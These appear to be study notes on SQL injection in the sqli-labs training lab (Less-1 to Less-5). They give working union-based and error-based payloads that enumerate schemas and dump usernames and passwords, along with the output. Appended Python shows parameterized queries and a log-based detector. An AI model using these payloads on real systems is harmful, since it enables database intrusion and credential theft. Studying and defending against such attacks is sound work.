SQL injection notes (sqli-labs environment)
SELECT * FROM users WHERE id=''1--'
http://localhost/sqli-labs/Less-1/?id=1 union select password from user where id='2'
Less-1: string-type SQL injection, injected directly:
1. Identify the injection point:
Input: http://localhost/sqli-labs/Less-1/?id=1' and 1=1 --+
MySQL statement executed: SELECT * FROM users WHERE id='1' and 1=1 -- ' LIMIT 0,1
2. Determine the number of columns:
Using order by:
Input: http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+
MySQL statement executed: SELECT * FROM users WHERE id='1' order by 3 -- ' LIMIT 0,1
Input: http://localhost/sqli-labs/Less-1/?id=1' order by 4--+
This errors out, so the table has 3 columns.
Using union:
Input: http://localhost/sqli-labs/Less-1/?id=1' union select null,null,null '
MySQL statement executed: SELECT * FROM users WHERE id='1' union select null,null,null '' LIMIT 0,1
http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3 '
MySQL statement executed: SELECT * FROM users WHERE id='1' union select 1,2,3'' LIMIT 0,1
http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3 and '1'=1'
MySQL statement executed: SELECT * FROM users WHERE id='1' union select 1,2,3 and '1'=1'' LIMIT 0,1
(The trailing '' produced by the application's own closing quote is parsed by MySQL as an empty column alias, which is why these statements remain valid.)
3. Query database information
A few functions first:
(1) version(): the database version
(2) user(): the current user
(3) database(): the database in use
(4) limit: a limit clause fetches all the data in batches
(5) group_concat(): fetches the database information in one go.
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 union select null,user(),database() ' // use id=1' and 1=2, or id=-1, so the original row is dropped and the injected values are displayed
MySQL statement executed: SELECT * FROM users WHERE id='1' and 1=2 union select null,user(),database() '' LIMIT 0,1
Statement to list the database names:
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
4. Dump data:
Hex encodings of the names used below:
security: 0x7365637572697479
users: 0x7573657273
Input: http://localhost/sqli-labs/Less-1/?id=1' and 1=2 union select null,group_concat(column_name),null from information_schema.columns where table_name=0x7573657273 and '1' = '1
Input: http://localhost/sqli-labs/Less-1/?id=1' and 1=2 union select null,username,password from users --+
group_concat usage:
group_concat([DISTINCT] column_to_concatenate [ORDER BY sort_column ASC/DESC] [SEPARATOR 'separator'])
select id, group_concat(username separator " ; ") from users; -- can be combined with group by id
5. List all databases: information_schema -> schemata -> schema_name
SQL statement: select schema_name from information_schema.schemata;
http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
6. List all tables (of security): information_schema -> tables -> table_name, table_schema
SQL statement to list the tables:
select group_concat(table_name) from information_schema.tables where table_schema="security";
Either the hex encoding or the plain string works:
http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3 --+
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema="security") ,database() --+
http://localhost/sqli-labs/less-1/?id=1' and 1=2 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema =database() ) --+
7. Get the column names:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572),3 --+
Restrict to the columns of the users table in the security database:
http://localhost/sqli-labs/less-1/?id=-1' and 1=1 union select 1,database(), (select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema ="security" ) --+
8. Get the data (show the usernames and passwords in users):
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(0x5c,username,0x5c,password) from users),3 --+
-------------------- done ------------------------------
Summary:
Table names: table_name;
Field (column) names: column_name
Dump values: group_concat(username,0x3a,password)
ASCII:
0x3a (:)  0x5c (\)
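The Less-1 query shape, reproduced here as an added example (not part of these notes or of sqli-labs) on an in-memory SQLite table with constructed rows: it shows why the step-8 payload works against string concatenation and why the same string returns nothing once the id travels as a bound parameter. The helper names, the sample rows and the integer-only validation are assumptions for the demonstration.

```python
import sqlite3

# Constructed stand-in for the sqli-labs "security.users" table (not the lab's own data).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def lookup_vulnerable(conn, user_id):
    # Same shape as the Less-1 query: the id value is spliced straight into the SQL text,
    # so a closing quote, a UNION and a trailing comment all become part of the statement.
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    # The value reaches the engine separately from the SQL text; quotes, UNION and
    # "--" inside it are compared against the id column as data and match no row.
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchall()

def lookup_validated(conn, user_id):
    # Defence in depth: id is an integer by contract, so reject anything else before
    # it gets near the database at all.
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return lookup_parameterized(conn, user_id)

# Step-8 payload from the notes with "--+" already URL-decoded to "-- ". SQLite's
# group_concat takes (expr, separator), so MySQL's multi-argument form is written with ||.
PAYLOAD = "-1' union select 1,(select group_concat(username || '||' || password) from users),3 -- "

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable   :", lookup_vulnerable(conn, PAYLOAD))
    print("parameterized:", lookup_parameterized(conn, PAYLOAD))
```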
Second practice run:
List databases:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),(select group_concat(schema_name) from information_schema.schemata) --+
Your Login name:security
Your Password:information_schema,aaa,challenges,discuz,dvwa,fendo,jokeDB,mysql,performance_schema,security,test,user
List tables:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema ="security") --+
Your Login name:security
Your Password:emails,referers,uagents,users
List columns:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_name ="users" and TABLE_SCHEMA = "security" ) --+
Your Login name:security
Your Password:id,username,password
Summary: database: security; tables: emails,referers,uagents,users; columns: id,username,password
Query the data:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),(select group_concat(username,"||",password) from users ) --+
Your Login name:security
Your Password:Dumb||Dumb,Angelina||I-kill-you,Dummy||p@ssword,secure||crappy,stupid||stupidity,superman||genious,batman||mob!le,admin||admin,admin1||admin1,admin2||admin2,admin3||admin3,dhakkan||dumbo,admin4||admin4
less-2:
Numeric SQL injection, injected directly:
http://localhost/sqli-labs/Less-2/?id=-1 and 1=1 union select 1,database(),(select group_concat(username,"||",password) from users) --+
Your Login name:security
Your Password:Dumb||Dumb,Angelina||I-kill-you,Dummy||p@ssword,secure||crappy,stupid||stupidity,superman||genious,batman||mob!le,admin||admin,admin1||admin1,admin2||admin2,admin3||admin3,dhakkan||dumbo,admin4||admin4
less-3:
SELECT * FROM users WHERE id=('1') and ('1'='2')
String-type SQL injection with parentheses, injected directly:
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,database(),(select group_concat(username,password) from users ) --+
less-4:
Close with ").
http://localhost/sqli-labs/Less-4/?id=-1") union select 1,database(),(select group_concat(username,"||",password) from users ) --+
less-5:
Reference for error-based injection functions: http://www.cnblogs.com/Dleo/p/5493782.html
Find the injection point:
http://localhost/sqli-labs/Less-5/?id=1' and 1=2 --+
Display data through the error-based functions:
http://localhost/sqli-labs/Less-5/?id=1' and (extractvalue(1,concat("||",(select database() ))) ) --+
Dump data (adjust the first argument of limit to pick which row is read):
http://localhost/sqli-labs/Less-5/?id=1' and (extractvalue(1,concat("->>",(select concat(username,"||",password) from users limit 3,1 ))) ) --+
On the MySQL command line:
select * from users where id=1 and (ExtractValue(1,concat("||",(select database() ))) );
Output: ERROR 1105 (HY000): XPATH syntax error: '||security'
ExtractValue is a function for querying an XML document:
EXTRACTVALUE (XML_document, XPath_string);
First argument: XML_document, a string containing the XML document (called Doc in the referenced article).
Second argument: XPath_string, an XPath expression.
Purpose: returns a string containing the values matched in the target XML.
Example: select * from users where id=1 and (ExtractValue(2,concat("||",(select database() ))) );
Injection form: and extractvalue(1, concat(0x5c, (SQL statement)))
Query database():
select * from users where id =1 and (ExtractValue(1,concat( '>',(select database())) ) );
Query user():
select * from users where id =1 and (ExtractValue(id,concat( '>',(select user())) ) );
Query version():
select * from users where id =1 and (ExtractValue(id,concat( '>',(select version())) ) );
Updatexml query:
Usage: 1=(updatexml(1,concat(">",(SQL statement)),1))
id = 1 and (updatexml(0x3a,concat(1,(select user())),1))
select * from users where id =1 and (updatexml(1,concat(">",(select version())),1 ));
select * from users where id =1 and (updatexml(1,concat(">",(select database())),1));
Note: on MySQL versions above 5.5.53 the exp() function can no longer be used for error-based injection.
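As an added example (not from these notes), a small access-log scanner that flags the payload families used throughout, both the Less-1 union/information_schema enumeration with hex-encoded names and the "--+" comment tail, and the Less-5 extractvalue/updatexml error-based probes, after URL-decoding the request path. The signature names, the log format and the constructed log lines are assumptions; each tag is a heuristic meant for scoring, not a verdict.

```python
import re
from urllib.parse import unquote_plus

# Signature families taken from the payloads in these notes. Each match is a heuristic,
# so the output is a set of tags for scoring or alerting, not a verdict by itself.
SIGNATURES = {
    "union_select":   re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum":    re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b"),
    "error_based":    re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "db_fingerprint": re.compile(r"\b(?:database|version|user)\s*\(\s*\)"),
    "hex_literal":    re.compile(r"\b0x[0-9a-f]{4,}\b"),
    "comment_tail":   re.compile(r"--\s"),
    "column_probe":   re.compile(r"\border\s+by\s+\d+\b"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(raw_path):
    # Decode twice ("--+" becomes "-- ", %25xx unwraps), collapse whitespace and
    # fold case, since MySQL treats TABLE_SCHEMA and table_schema alike.
    decoded = unquote_plus(unquote_plus(raw_path))
    return re.sub(r"\s+", " ", decoded).lower()

def classify_request(raw_path):
    text = normalize(raw_path)
    return {tag for tag, rx in SIGNATURES.items() if rx.search(text)}

def scan_log(lines):
    # Returns (request_path, tags) for every request that trips at least one signature.
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            tags = classify_request(m.group(1))
            if tags:
                hits.append((m.group(1), tags))
    return hits

# Constructed access-log lines modelled on the Less-1 and Less-5 requests above.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2023:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 1234',
    '127.0.0.1 - - [10/Oct/2023:10:00:02 +0000] "GET /sqli-labs/Less-1/?id=1%27%20order%20by%204--+ HTTP/1.1" 500 512',
    '127.0.0.1 - - [10/Oct/2023:10:00:03 +0000] "GET /sqli-labs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20--+ HTTP/1.1" 200 1400',
    '127.0.0.1 - - [10/Oct/2023:10:00:04 +0000] "GET /sqli-labs/Less-5/?id=1%27%20and%20(extractvalue(1,concat(%22||%22,(select%20database()))))%20--+ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(sorted(tags), path)
```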
